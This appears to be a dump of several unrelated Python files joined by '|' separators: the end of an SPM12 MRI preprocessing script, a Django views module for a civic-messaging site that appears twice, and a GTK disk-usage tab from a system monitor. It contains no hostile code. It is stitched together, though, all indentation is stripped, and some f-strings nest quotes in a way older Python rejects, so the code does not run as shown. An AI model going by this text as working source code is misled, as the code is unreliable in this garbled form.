shutil.move(input_data[p][ts]['seg'], re.sub("/([^\n/]*)\.nii", "/\g<1>_RL_final.nii", input_data[p][ts]['seg'])) # For consistency of the names of final products.
# run segment
inputs = []
for i in range(len(tit)):
t = tit[i]
if t == 't1ce':
inputs.append(input_data[p][ts][t])
else:
inputs.append(re.sub(f"/([^\n/]+\.nii)", "/r\g<1>", input_data[p][ts][t]))
# ### lines for resample(not segment)
# for ri in inputs:
# resample_mri(ri, voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>\g<2>")
# ###
m_script = convert_mscript("segment", inputs)
_run_m_script(m_script) # T1 & T2 segment
os.remove(m_script)
# Make mask for stripping skull(clean up).
inputs = [re.sub(f"/([^\n/]+\.nii)", "/r\g<1>", input_data[p][ts]['t1'])]
logger.info(f"inputs for clean up segment were made.")
m_script = convert_mscript("segment_only_t1_cleanup", inputs)
logger.info(f"m_script was made.")
_run_m_script(m_script) # segment T1 only
logger.info(f"running m_script complete.")
os.remove(m_script)
# Rename c* files(clean up).
cf = re.sub("/[^\n/]+\.nii", "", input_data[p][ts]['t1']) # current folder
for file in list(filter(lambda x:re.search("cleanup", x) is None, glob.glob(f"{cf}/c*.nii"))):
nn = re.sub("/(c[0-9])([^\n/]+)\.nii", "/\g<1>\g<2>_cleanup.nii", file) # new name
shutil.move(file, nn)
logger.info(f"{file} was renamed to {nn}.")
# Make mask for stripping skull(no clean up).
inputs = [re.sub(f"/([^\n/]+\.nii)", "/r\g<1>", input_data[p][ts]['t1'])]
m_script = convert_mscript("segment_only_t1_no-cleanup", inputs)
_run_m_script(m_script) # segment T1 only
os.remove(m_script)
# Rename c* files(no clean up).
cf = re.sub("/[^\n/]+\.nii", "", input_data[p][ts]['t1']) # current folder
for file in list(filter(lambda x:re.search("cleanup", x) is None, glob.glob(f"{cf}/c*.nii"))):
nn = re.sub("/(c[0-9])([^\n/]+)\.nii", "/\g<1>\g<2>_no-cleanup.nii", file) # new name
shutil.move(file, nn)
logger.info(f"{file} was renamed to {nn}.")
# run imgcalc(skull stripping)
for i in range(len(tit)):
t = tit[i]
if t == 't1ce':
inputs = re.sub(f"/([^\n/]+\.nii)", "/m\g<1>", input_data[p][ts][t])
else:
inputs = re.sub(f"/([^\n/]+\.nii)", "/mr\g<1>", input_data[p][ts][t])
inputs = [inputs] + [re.sub(f"/([^\n/]+)\.nii", "/c1r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
+ [re.sub(f"/([^\n/]+)\.nii", "/c2r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
+ [re.sub(f"/([^\n/]+)\.nii", "/c3r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
+ [re.sub(f"^.*/([^\n/]+)\.nii", "\g<1>_BrainExtractionBrain_final.nii", inputs)]\
+ [re.search(f"(^.+)/([^\n/]+\.nii)", inputs).group(1)]
m_script = convert_mscript("imgcalc", inputs)
_run_m_script(m_script) # T1 & T2 imgcalc
os.remove(m_script)
# Save mask nii file
inputs = [inputs[0]] + [re.sub(f"/([^\n/]+)\.nii", "/c1r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
+ [re.sub(f"/([^\n/]+)\.nii", "/c2r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
+ [re.sub(f"/([^\n/]+)\.nii", "/c3r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
+ ["BrainExtractionMask.nii"]\
+ [re.search(f"(^.+)/([^\n/]+\.nii)", input_data[p][ts]['t1ce']).group(1)]
m_script = convert_mscript("imgcalc_mask", inputs)
_run_m_script(m_script) # T1 & T2 imgcalc
os.remove(m_script)
logger.info(f">> SPM Process complete.")
def run_spm12(root_folder, img_types, pid):
img_type_ref = ['t1ce', 't1', 't2', 'flair', 'seg']
for i in img_types:
if i not in img_type_ref: raise ValueError(f"Invaild img type. Ref = {img_type_ref}.")
if 'seg' in img_types:
img_types.remove('seg')
img_types.insert(len(img_types), 'seg')
if 't1ce' in img_types:
img_types.remove('t1ce')
img_types.insert(0, 't1ce')
gunzip_nii_gz_files(root_folder, img_types, pid)
input_dict = spm12_input_dict(root_folder, img_types, pid)
run_spm12_process(input_dict)
gzip_nii_files(root_folder, img_types, pid, nii_file_pattern = "_final.nii")
gzip_nii_files(root_folder, ['t1ce'], pid, nii_file_pattern = "Mask.nii")
logger.info(f">> The whole processes complete.")
def communicate_subprocesses(subpcs, pids, return_code_dict):
# How about using subprcoess.poll method? https://stackoverflow.com/questions/41167884/dont-wait-for-subprocesses-but-check-for-returncode-later-on
for i in range(len(subpcs)):
sp = subpcs[i]
try:
pr = sp.poll()
if pr != return_code_dict[pids[i]]:
logger.info(f"The return code of process of {pids[i]}: {pr}")
return_code_dict[pids[i]]=pr
except TimeoutExpired as e:
continue
return return_code_dict
if args.command == 'convert':
convert_mscript(args.m_script, args.output)
logger.info("Converting process complete.")
elif args.command == 'gunzip':
gunzip_nii_gz_files(args.root_folder, args.scan_types, args.patient_id)
elif args.command == 'resample':
resample_mri(args.input_path, args.voxel_size)
elif args.command == 'run':
logger.info(f"patient id : {args.patient_id}")
subpcs = []
args.root_folder = os.path.abspath(args.root_folder)
args.m_script_archive = os.path.abspath(args.m_script_archive)
if (len(args.patient_id) > 1) or (args.patient_id == ['all']):
if args.patient_id == ['all']:
pids = set(if_found_return_groups("[0-9]{8}", glob.glob(f"{args.root_folder}/**/*.nii.gz", recursive = True), 0))
pids = list(pids)
else:
pids = args.patient_id
assert len(args.patient_id) == len(pids), "Found patient ids were not matched to input patient ids."
os.makedirs(f"{args.root_folder}/spm12_logs", exist_ok=True)
return_code_dict = dict.fromkeys(pids)
for pid in pids:
logger.info(f'''python {args.m_script_archive}/spm12_cmdline_main.py -l {args.root_folder}/spm12_logs/{pid}_spm12_run.log run {args.root_folder} {pid} -s {' '.join(args.scan_types)}'''.split())
subpcs.append(
Popen(f'''python {args.m_script_archive}/spm12_cmdline_main.py -l {args.root_folder}/spm12_logs/{pid}_spm12_run.log run {args.root_folder} {pid} -s {' '.join(args.scan_types)}'''.split(),
stdout = DEVNULL, stderr = DEVNULL, cwd = os.getcwd())
)
while None in return_code_dict.values():
return_code_dict = communicate_subprocesses(subpcs, pids, return_code_dict)
time.sleep(5)
logger.info(f"Job orders: {pids}")
logger.info(f"Exit codes: {return_code_dict.items()}")
elif (len(args.patient_id) == 1) and (re.search("[0-9]{8}", args.patient_id[0]) is not None):
run_spm12(args.root_folder, args.scan_types, args.patient_id) |
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.views import generic
from .forms import ContactForm
from django.core.mail import send_mail, BadHeaderError
from .models import Suggestions, Comment, UserProfile, Post, Category, Favorite
from django.contrib.auth.models import User
from django.conf import settings
from django.contrib.auth import logout
# Create your views here.
class IndexView(generic.TemplateView):
template_name = 'home/index.html'
def accounts_view(request):
return render(request, "accounts.html")
def categories(request):
catgories = list(Category.objects.all())
return render(request, "categories.html", {'catgories': catgories})
def singleCategory(request, categorySlug):
get_category = Category.objects.get(slug=categorySlug)
posts = list(Post.objects.filter(category=get_category))
return render(request, "posts.html", {'posts': posts, 'category': get_category})
def comment(request, categorySlug, postSlug):
get_category = Category.objects.get(slug=categorySlug)
post = Post.objects.get(slug=postSlug)
comments = list(Comment.objects.filter(post=post))
try: #Attempt pull from custom user data
user_profile = UserProfile.objects.get(user=request.user)
name = user_profile.my_first_name + ' ' + user_profile.my_last_name
except UserProfile.DoesNotExist: #Else pull from request user data
name = request.user.first_name + ' ' + request.user.last_name
return render(request, "comment.html", {'post': post, 'comments': comments, 'category': get_category, 'name': name})
def postComment(request):
data_in = request.POST.copy()
post = data_in['post']
name = data_in['name']
comments = data_in['comments']
comment_model = Comment()
comment_model.post = Post.objects.get(id=post)
comment_model.author = name
comment_model.text = comments
comment_model.save()
return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))
def myProfile(request):
data = {}
data['first_name'] = request.user.first_name
data['last_name'] = request.user.last_name
data['email'] = request.user.email
# IF USER HAS USER PROFILE MADE, pull from that data
try:
profile = UserProfile.objects.get(user=request.user)
data['email'] = profile.my_email
data['first_name'] = profile.my_first_name
data['last_name'] = profile.my_last_name
data['phone'] = profile.phone
data['address'] = profile.address
data['city'] = profile.city
data['state'] = profile.state
data['zip_code'] = profile.zip_code
favorites = Favorite.objects.filter(user=profile)
data['favorites'] = []
for fav in favorites:
if fav not in data['favorites']:
data['favorites'].append(fav.name)
# If user does not have user profile made, pull from the standard user data
except UserProfile.DoesNotExist: # change to extend exception?
data['email'] = request.user.email
data['first_name'] = request.user.first_name
data['last_name'] = request.user.last_name
data['categories'] = list(Category.objects.all())
return render(request, "my-profile.html", data)
def myProfileAction(request):
# Take in the data from the button press
data_in = request.POST.copy()
# If the profile has been made, get the objects from the profile and delete current favorites (so that new ones
# will be added with the submission)
try:
new_profile = UserProfile.objects.get(user=request.user)
Favorite.objects.filter(user=UserProfile.objects.get(user=request.user)).delete()
# If the profile has not been made, create a new profile that extends the default user
# profile from the authentication
except UserProfile.DoesNotExist:
new_profile = UserProfile() # Create new user profile
new_profile.user = User.objects.get(id=request.user.id) # Populate user field with extension from default user
# NOTE: the following will only save phone number, not the other stuff; will figure out how to do that later
new_profile.my_first_name = data_in['first_name'] # Save inputted first name in the my_first_name field
new_profile.my_last_name = data_in['last_name'] # Save inputted last name in the my_last_name field
new_profile.my_email = data_in['email'] # Save inputted email in the my_email field
new_profile.phone = data_in['phone'] # Save inputted phone number in the phone field
new_profile.address = data_in['address'] # Save inputs about address
new_profile.city = data_in['city'] # Save inputs about City
new_profile.state = data_in['state'] # Save inputs about State
new_profile.zip_code = data_in['zip_code'] # Save inputs about address
# To check for favorites, first get all of the favorites data from the form
favorites_form = request.POST.getlist('favorites[]')
# Now, we want to add in all of the favorites the user has chosen.
for fav in favorites_form:
new_fav = Favorite()
new_fav.name = fav
new_fav.user = new_profile
new_fav.save() # Make sure to save each favorite
new_profile.save() # Save changes made to the UserProfile
return redirect('/')
def feedback(request):
categories_list = list(Category.objects.all())
if request.method == "POST":
contact = Suggestions()
name = request.POST.get('name')
email = request.POST.get('email')
subject = request.POST.get('subject')
message = request.POST.get('message')
contact.name = name
contact.email = email
contact.subject = subject
contact.message = message
contact.save()
return redirect("/thankyou/")
return render(request, 'feedback.html', {'categories': categories_list})
def thankyou(request):
return render(request, "thankyou.html")
def logout_view(request):
logout(request)
return render(request, "logout.html")
def generate(request):
data_in = request.POST.copy()
try:
user_profile = UserProfile.objects.get(user=request.user)
email = user_profile.my_email
first_name = user_profile.my_first_name
last_name = user_profile.my_last_name
phone = user_profile.phone
except UserProfile.DoesNotExist:
email = request.user.email
first_name = request.user.first_name
last_name = request.user.last_name
phone = '123-456-7890'
category = data_in['category']
text = data_in['text']
level = data_in['level']
text = 'To whom it may concern, \n\nMy name is '+ first_name + ' ' + last_name + \
' and I am writing to you about the issue of ' + category + ':' + '\n\n\b' + text + \
'\n\nIf you wish to contact me, my phone number is ' + phone + ' and my email address is ' + email +\
'.\n\nSincerely, \n' + first_name + ' ' + last_name
return render(request, "generate.html", {'text': text, 'category': category, 'level': level})
def contact_form(request):
try:
user_profile = UserProfile.objects.get(user=request.user)
email = user_profile.my_email
first_name = user_profile.my_first_name
last_name = user_profile.my_last_name
except UserProfile.DoesNotExist:
email = request.user.email
first_name = request.user.first_name
last_name = request.user.last_name
form = ContactForm(initial={'email': email, 'name': first_name + ' ' + last_name})
text = request.GET.get('text', '')
if request.method == 'POST':
form = ContactForm(request.POST)
if form.is_valid():
subject = f'Civic Connect Message from: {form.cleaned_data['name']}'
dataIn = request.POST.copy()
message = dataIn["message"]
sender = ("hondacivicsuva@gmail.com")
recipient_email = dataIn["recipient_email"]
recipients = [recipient_email]
try:
send_mail(subject, message, sender, recipients, fail_silently=True)
except BadHeaderError:
return HttpResponse('Invalid header found')
return redirect("/thankyou/")
return render(request, "contact.html", {'form': form, 'text': text})
# Contact From/ Sendgrid template taken from: https://github.com/the-kodechamp/django_blog_tutorial/blob/master/blog/templates
| from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.views import generic
from .forms import ContactForm
from django.core.mail import send_mail, BadHeaderError
from .models import Suggestions, Comment, UserProfile, Post, Category, Favorite
from django.contrib.auth.models import User
from django.conf import settings
from django.contrib.auth import logout
# Create your views here.
class IndexView(generic.TemplateView):
template_name = 'home/index.html'
def accounts_view(request):
return render(request, "accounts.html")
def categories(request):
catgories = list(Category.objects.all())
return render(request, "categories.html", {'catgories': catgories})
def singleCategory(request, categorySlug):
get_category = Category.objects.get(slug=categorySlug)
posts = list(Post.objects.filter(category=get_category))
return render(request, "posts.html", {'posts': posts, 'category': get_category})
def comment(request, categorySlug, postSlug):
get_category = Category.objects.get(slug=categorySlug)
post = Post.objects.get(slug=postSlug)
comments = list(Comment.objects.filter(post=post))
try: #Attempt pull from custom user data
user_profile = UserProfile.objects.get(user=request.user)
name = user_profile.my_first_name + ' ' + user_profile.my_last_name
except UserProfile.DoesNotExist: #Else pull from request user data
name = request.user.first_name + ' ' + request.user.last_name
return render(request, "comment.html", {'post': post, 'comments': comments, 'category': get_category, 'name': name})
def postComment(request):
data_in = request.POST.copy()
post = data_in['post']
name = data_in['name']
comments = data_in['comments']
comment_model = Comment()
comment_model.post = Post.objects.get(id=post)
comment_model.author = name
comment_model.text = comments
comment_model.save()
return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))
def myProfile(request):
data = {}
data['first_name'] = request.user.first_name
data['last_name'] = request.user.last_name
data['email'] = request.user.email
# IF USER HAS USER PROFILE MADE, pull from that data
try:
profile = UserProfile.objects.get(user=request.user)
data['email'] = profile.my_email
data['first_name'] = profile.my_first_name
data['last_name'] = profile.my_last_name
data['phone'] = profile.phone
data['address'] = profile.address
data['city'] = profile.city
data['state'] = profile.state
data['zip_code'] = profile.zip_code
favorites = Favorite.objects.filter(user=profile)
data['favorites'] = []
for fav in favorites:
if fav not in data['favorites']:
data['favorites'].append(fav.name)
# If user does not have user profile made, pull from the standard user data
except UserProfile.DoesNotExist: # change to extend exception?
data['email'] = request.user.email
data['first_name'] = request.user.first_name
data['last_name'] = request.user.last_name
data['categories'] = list(Category.objects.all())
return render(request, "my-profile.html", data)
def myProfileAction(request):
# Take in the data from the button press
data_in = request.POST.copy()
# If the profile has been made, get the objects from the profile and delete current favorites (so that new ones
# will be added with the submission)
try:
new_profile = UserProfile.objects.get(user=request.user)
Favorite.objects.filter(user=UserProfile.objects.get(user=request.user)).delete()
# If the profile has not been made, create a new profile that extends the default user
# profile from the authentication
except UserProfile.DoesNotExist:
new_profile = UserProfile() # Create new user profile
new_profile.user = User.objects.get(id=request.user.id) # Populate user field with extension from default user
# NOTE: the following will only save phone number, not the other stuff; will figure out how to do that later
new_profile.my_first_name = data_in['first_name'] # Save inputted first name in the my_first_name field
new_profile.my_last_name = data_in['last_name'] # Save inputted last name in the my_last_name field
new_profile.my_email = data_in['email'] # Save inputted email in the my_email field
new_profile.phone = data_in['phone'] # Save inputted phone number in the phone field
new_profile.address = data_in['address'] # Save inputs about address
new_profile.city = data_in['city'] # Save inputs about City
new_profile.state = data_in['state'] # Save inputs about State
new_profile.zip_code = data_in['zip_code'] # Save inputs about address
# To check for favorites, first get all of the favorites data from the form
favorites_form = request.POST.getlist('favorites[]')
# Now, we want to add in all of the favorites the user has chosen.
for fav in favorites_form:
new_fav = Favorite()
new_fav.name = fav
new_fav.user = new_profile
new_fav.save() # Make sure to save each favorite
new_profile.save() # Save changes made to the UserProfile
return redirect('/')
def feedback(request):
categories_list = list(Category.objects.all())
if request.method == "POST":
contact = Suggestions()
name = request.POST.get('name')
email = request.POST.get('email')
subject = request.POST.get('subject')
message = request.POST.get('message')
contact.name = name
contact.email = email
contact.subject = subject
contact.message = message
contact.save()
return redirect("/thankyou/")
return render(request, 'feedback.html', {'categories': categories_list})
def thankyou(request):
return render(request, "thankyou.html")
def logout_view(request):
logout(request)
return render(request, "logout.html")
def generate(request):
data_in = request.POST.copy()
try:
user_profile = UserProfile.objects.get(user=request.user)
email = user_profile.my_email
first_name = user_profile.my_first_name
last_name = user_profile.my_last_name
phone = user_profile.phone
except UserProfile.DoesNotExist:
email = request.user.email
first_name = request.user.first_name
last_name = request.user.last_name
phone = '123-456-7890'
category = data_in['category']
text = data_in['text']
level = data_in['level']
text = 'To whom it may concern, \n\nMy name is '+ first_name + ' ' + last_name + \
' and I am writing to you about the issue of ' + category + ':' + '\n\n\b' + text + \
'\n\nIf you wish to contact me, my phone number is ' + phone + ' and my email address is ' + email +\
'.\n\nSincerely, \n' + first_name + ' ' + last_name
return render(request, "generate.html", {'text': text, 'category': category, 'level': level})
def contact_form(request):
try:
user_profile = UserProfile.objects.get(user=request.user)
email = user_profile.my_email
first_name = user_profile.my_first_name
last_name = user_profile.my_last_name
except UserProfile.DoesNotExist:
email = request.user.email
first_name = request.user.first_name
last_name = request.user.last_name
form = ContactForm(initial={'email': email, 'name': first_name + ' ' + last_name})
text = request.GET.get('text', '')
if request.method == 'POST':
form = ContactForm(request.POST)
if form.is_valid():
subject = f'Civic Connect Message from: {form.cleaned_data["name"]}'
dataIn = request.POST.copy()
message = dataIn["message"]
sender = ("hondacivicsuva@gmail.com")
recipient_email = dataIn["recipient_email"]
recipients = [recipient_email]
try:
send_mail(subject, message, sender, recipients, fail_silently=True)
except BadHeaderError:
return HttpResponse('Invalid header found')
return redirect("/thankyou/")
return render(request, "contact.html", {'form': form, 'text': text})
# Contact From/ Sendgrid template taken from: https://github.com/the-kodechamp/django_blog_tutorial/blob/master/blog/templates
|
#!/usr/bin/env python3
# import gi
# gi.require_version("Gtk", "3.24")
from gi.repository import Gtk as g,Gdk
import psutil as ps
from time import time
from os import popen
# Importing neccessary files
try:
from gi_composites import GtkTemplate
except ImportError:
from sysmontask.gi_composites import GtkTemplate
if __name__=='sysmontask.disk':
from sysmontask.sysmontask import files_dir
from sysmontask.gproc import sorting_func,byte_to_human
else:
from sysmontask import files_dir
from gproc import sorting_func,byte_to_human
@GtkTemplate(ui=files_dir+'/disk.glade')
class diskTabWidget(g.ScrolledWindow):
"""
A disk tab widget(top level box with all childs fields) which is made by the gtk template.
"""
# Required else you would need to specify the full module
# name in mywidget.ui (__main__+MyWidget)
__gtype_name__ = 'diskTabWidget'
# Declaring/Fetching/Assigning the required childs(name in the template should be the same as used here)
disktextlabel= GtkTemplate.Child()
diskinfolabel = GtkTemplate.Child()
diskdrawarea1=GtkTemplate.Child()
diskdrawarea2=GtkTemplate.Child()
disktextlabel=GtkTemplate.Child()
diskactivelabelvalue=GtkTemplate.Child()
diskreadlabelvalue=GtkTemplate.Child()
diskwritelabelvalue=GtkTemplate.Child()
diskcurrenspeedlabelvalue=GtkTemplate.Child()
diskUsagesTreeView=GtkTemplate.Child()
disk_read_color_descriptor= GtkTemplate.Child()
disk_write_color_descriptor= GtkTemplate.Child()
# Alternative way to specify multiple widgets
#label1, entry = GtkTemplate.Child.widgets(2)
def __init__(self):
"""Constructing the Disk Widget."""
super(g.ScrolledWindow, self).__init__()
# This must occur *after* you initialize your base
self.init_template()
# For the scaling of maximum value on the graph
self.diskmxfactor=1
self.secondself=None # main class
def givedata(self,secondself,index):
"""
Method to pass the data to the class object from outside. And assign them to the local class variables.
Parameters
----------
secondself : the main class reference(the main self) which will be calling this function.
index : index of the disk from several disks
"""
self.diskactiveArray=secondself.diskActiveArray[index]
self.diskreadArray=secondself.diskReadArray[index]
self.diskwriteArray=secondself.diskWriteArray[index]
self.secondself=secondself
@GtkTemplate.Callback
def on_diskDrawArea1_draw(self,dr,cr):
"""
Function Binding(for draw signal) for Disk Utilisation draw area.
This function draw the Disk's Utilisation curves upons called by the queue of request in the updator
function.
Parameters
----------
dr : the widget on which to draw the graph
cr : the cairo surface object
"""
cr.set_line_width(2)
# Color Pofile setup
color=self.secondself.color_profile['disk'][0]
rectangle_color=self.secondself.color_profile['disk'][1]
# Get the allocated width and height
w=self.diskdrawarea1.get_allocated_width()
h=self.diskdrawarea1.get_allocated_height()
# Vertical step size
scalingfactor=h/100.0
#creating outer rectangle
# cr.set_source_rgba(.109,.670,.0588,1)
cr.set_source_rgba(*rectangle_color,1)
cr.set_line_width(3)
cr.rectangle(0,0,w,h)
cr.stroke()
# creating grid lines
verticalGap=int(h/10)
horzontalGap=int(w/10)
for i in range(1,10):
# cr.set_source_rgba(.109,.670,.0588,1) #for changing the outer line color
cr.set_source_rgba(*color,1)
cr.set_line_width(0.5)
cr.move_to(0,i*verticalGap)
cr.line_to(w,i*verticalGap)
cr.move_to(i*horzontalGap,0)
cr.line_to(i*horzontalGap,h)
cr.stroke()
cr.stroke()
# Horizontal step size
stepsize=w/99.0
# Drawing the outer lines for the curve
# cr.set_source_rgba(.109,.670,.0588,1) #for changing the outer line color
cr.set_source_rgba(*color,1)
cr.set_line_width(1.5)
cr.move_to(0,scalingfactor*(100-self.diskactiveArray[0])+2)
for i in range(0,99):
cr.line_to((i+1)*stepsize,scalingfactor*(100-self.diskactiveArray[i+1])+2)
cr.stroke_preserve()
# Filling the curve
# cr.set_source_rgba(.431,1,.04,0.25) #for changing the fill color
cr.set_source_rgba(*color,0.25)
cr.line_to(w,h)
cr.line_to(0,h)
cr.move_to(0,scalingfactor*(100-self.diskactiveArray[0])+2)
cr.fill()
cr.stroke()
return False
@GtkTemplate.Callback
def on_diskDrawArea2_draw(self,dr,cr):
"""
Function Binding(for draw signal) for disk speed draw area.
This function draw the Disk's Read and Write speed curves upon called by the queue of request generated in the
main updator function.
Parameters
----------
dr : the widget on which to draw the graph
cr : the cairo surface object
"""
cr.set_line_width(2)
# Color Pofile setup
color=self.secondself.color_profile['disk'][0]
rectangle_color=self.secondself.color_profile['disk'][1]
self.disk_read_color_descriptor.set_markup(f'<span size="20000" foreground="{'#%02x%02x%02x' % (int(color[0]*255), int(color[1]*255), int(color[2]*255))}">|</span>')
self.disk_write_color_descriptor.set_markup(f'<span size="20000" foreground="{'#%02x%02x%02x' % (int(color[0]*255), int(color[1]*255), int(color[2]*255))}">¦</span>')
# Get the allocated widht and height
w=self.diskdrawarea2.get_allocated_width()
h=self.diskdrawarea2.get_allocated_height()
# Speed step in MB/s is the step in which the maximum speed(vertical scale) will adjust for dynamic speeds, i.e, in multiples
# of this step.
speedstep=50
# The maximum read or write speeds in the buffer
maximumcurrentspeed=max(max(self.diskreadArray),max(self.diskwriteArray))
# The current maximum scale speed
currentscalespeed=self.diskmxfactor*speedstep
# vertical scale adjustment calculation, i.e, new maximum scale speed
if(currentscalespeed<maximumcurrentspeed):
while(currentscalespeed<maximumcurrentspeed):
self.diskmxfactor+=1
currentscalespeed=self.diskmxfactor*speedstep
else:
while(currentscalespeed>maximumcurrentspeed+speedstep and self.diskmxfactor>1):
self.diskmxfactor-=1
currentscalespeed=self.diskmxfactor*speedstep
# Setting new maximum scale label
self.diskcurrenspeedlabelvalue.set_text(str(currentscalespeed)+'MB/s')
# vertical scaling factor(step)
scalingfactor=h/currentscalespeed
#creating outer rectangle
# cr.set_source_rgba(.109,.670,.0588,1)
cr.set_source_rgba(*rectangle_color,1)
cr.set_line_width(3)
cr.rectangle(0,0,w,h)
cr.stroke()
# creating grid lines
verticalGap=int(h/10)
horzontalGap=int(w/10)
for i in range(1,10):
# cr.set_source_rgba(.109,.670,.0588,1) #for changing the grid line color
cr.set_source_rgba(*color,1)
cr.set_line_width(0.5)
cr.move_to(0,i*verticalGap)
cr.line_to(w,i*verticalGap)
cr.move_to(i*horzontalGap,0)
cr.line_to(i*horzontalGap,h)
cr.stroke()
cr.stroke()
# Horzontal step size
stepsize=w/99.0
## Read Speed ##
# Drawing the curve line
# cr.set_source_rgba(.109,.670,.0588,1) #for changing the outer line color
cr.set_source_rgba(*color,1)
cr.set_line_width(1.5)
cr.move_to(0,scalingfactor*(currentscalespeed-self.diskreadArray[0])+2)
for i in range(0,99):
cr.line_to((i+1)*stepsize,scalingfactor*(currentscalespeed-self.diskreadArray[i+1])+2)
cr.stroke_preserve()
# Filling the curve with solid color, the curve(shape) should be a closed then only it can be filled
# cr.set_source_rgba(.431,1,.04,0.25) #for changing the fill color
cr.set_source_rgba(*color,0.2)
cr.line_to(w,h)
cr.line_to(0,h)
cr.move_to(0,scalingfactor*(currentscalespeed-self.diskreadArray[i])+2)
cr.fill()
cr.stroke()
## Write Speed ##
# Drawing the outer lines for the curve
# cr.set_source_rgba(.207,.941,.682,1) #for changing the outer line color
cr.set_source_rgba(*color,1)
cr.set_line_width(1.5)
cr.move_to(0,scalingfactor*(currentscalespeed-self.diskwriteArray[0])+2)
# Dash line configuration
cr.set_dash([3.0,3.0])
for i in range(0,99):
cr.line_to((i+1)*stepsize,scalingfactor*(currentscalespeed-self.diskwriteArray[i+1])+2)
cr.stroke_preserve()
# Filling the curve
# cr.set_source_rgba(.207,.941,.682,0.3) #for changing the fill color
cr.set_source_rgba(*color,0.2)
cr.line_to(w,h)
cr.line_to(0,h)
cr.move_to(0,scalingfactor*(currentscalespeed-self.diskwriteArray[0])+2)
cr.fill()
cr.stroke()
return False
def diskinit(self):
"""
Initilization of the Disk Components.
"""
# Declaring the lists to hold the name and size of the disks.
self.disklist=[]
self.disksize=[]
# Getting the name and size of the disks using shell command,(excluding zrams)
try:
p=popen('lsblk -d | grep -e ^NAME -e disk')
partitions=p.readlines()
p.close()
for parts in partitions:
tempparts=parts.split()
if 'NAME' not in tempparts[0] and 'zram' not in tempparts[0]:
self.disklist.append(tempparts[0])
self.disksize.append(tempparts[3])
print(tempparts[0])
except Exception as e:
print(f"Failed to get Disks: {e}")
# Declaring the Lists and dictionary for data holding
self.diskWidgetList={}
self.diskstate1=[]
self.diskActiveArray=[]
self.diskReadArray=[]
self.diskWriteArray=[]
self.numOfDisks=len(self.disklist)
# For partition information
self.diskPartitions={}
self.diskListStores={}
self.diskListStoreItrs={}
partitions=ps.disk_partitions()
# for scanning each
for i in range(0,self.numOfDisks):
# Creating a disk tab widget
self.diskWidgetList[i]=diskTabWidget()
# Adding to the stack
self.performanceStack.add_titled(self.diskWidgetList[i],f'page{self.stack_counter}','Disk'+str(i))
# For lookup devices and its assigned page number
self.device_stack_page_lookup[self.disklist[i]]=self.stack_counter
# Incrementing the stack counter to be used for side pane
self.stack_counter+=1
# Setting the labels for a disk at index i
self.diskWidgetList[i].disktextlabel.set_text(self.disklist[i])
self.diskWidgetList[i].diskinfolabel.set_text(self.disksize[i])
# Getting th I/O of disk
disktemp=ps.disk_io_counters(perdisk=True)
# Time for the previous data
self.diskt1=time()
# Storing the state1 of the different disks
for drives in disktemp:
if drives==self.disklist[i]:
self.diskstate1.append(disktemp[drives])
# partition info
self.diskPartitions[i]=[]
for part in partitions:
if self.disklist[i] in part[0]:
self.diskPartitions[i]+=[part]
# ListStore for treeview of disk storage
self.diskListStores[i]=g.ListStore(str,str,str,str,str,int,bool)
self.diskListStoreItrs[i]=[] # list of iterators for each row for a disk
# Storing the values in the list stores
for part in self.diskPartitions[i]:
temp=ps.disk_usage(part[1])
itr=self.diskListStores[i].append([part[0],part[1],part[2],byte_to_human(temp[0],persec=False),byte_to_human(temp[1],persec=False),temp[3],False])
self.diskListStoreItrs[i].append(itr)
# setting the model(liststore) for the treeview
self.diskWidgetList[i].diskUsagesTreeView.set_model(self.diskListStores[i])
# Iterating for making each column in the disk treeview
for k,col in enumerate(['Device','MountPoint','Type','Total','Used']):
# Text renderer
renderer=g.CellRendererText()
# Creating a column and assigning additional properties based on type
if col=='Used':
column=g.TreeViewColumn(col)
progRenderer=g.CellRendererProgress()
# progRenderer.props.text='50%'
# progRenderer.props.fraction=0.5
column.pack_start(renderer,False)
column.add_attribute(renderer,"text",4)
column.pack_start(progRenderer,False)
column.add_attribute(progRenderer,"value",5)
# column=g.TreeViewColumn(col,progRenderer,value=5,inverted=6)
else:
column=g.TreeViewColumn(col,renderer,text=k)
# Making each column sortable, resizable, and reorderable
column.set_sort_column_id(k)
column.set_resizable(True)
column.set_reorderable(True)
# column.set_expand(True)
column.set_alignment(0)
column.set_sort_indicator(True)
# Appending the column to the disk treestore
self.diskWidgetList[i].diskUsagesTreeView.append_column(column)
# self.processTreeStore.set_sort_func(i,sorting_func,None)
# Setting the custom sorting fucntion for the column 3(used column)
self.diskListStores[i].set_sort_func(3,sorting_func,3)
# data holding arrays
self.diskActiveArray.append([0]*100)
self.diskReadArray.append([0]*100)
self.diskWriteArray.append([0]*100)
# Providing the data to the disktab widget class
self.diskWidgetList[i].givedata(self,i)
def diskTabUpdate(self):
"""
Function to periodically update DISKs statistics.
"""
# getting the disk I/O and the current time
disktemp :dict(read_count,write_count,read_bytes,write_bytes,read_time,write_time,mrc,wrc,busy_time)=ps.disk_io_counters(perdisk=True)
self.diskt2=time()##
# Time elapsed from the previous update
timediskDiff=self.diskt2-self.diskt1
# Array for current state
self.diskstate2=[]
# Updating the disk storage tree view(partitions)
for i in range(0,self.numOfDisks):
try:
# New disk I/O state
self.diskstate2.append(disktemp[self.disklist[i]])
for j,part in enumerate(self.diskPartitions[i]):
temp=ps.disk_usage(part[1])
self.diskListStores[i].set(self.diskListStoreItrs[i][j],3,byte_to_human(temp[0],persec=False),4,byte_to_human(temp[1],persec=False),5,temp[3])
except Exception as e:
print(f"error in diskliststore: {e}")
# list to store the difference between the previous and the current disk state and to hold the disk active(utilisation)
self.diskActiveString=[]
for i in range(0,self.numOfDisks):
try:
# Calclulating the difference between current and previous disk state
diskDiff :list =[self.diskstate2[i].read_bytes-self.diskstate1[i].read_bytes\
,self.diskstate2[i].write_bytes-self.diskstate1[i].write_bytes\
,self.diskstate2[i].busy_time-self.diskstate1[i].busy_time]
# Disk active(utilisation) percentage
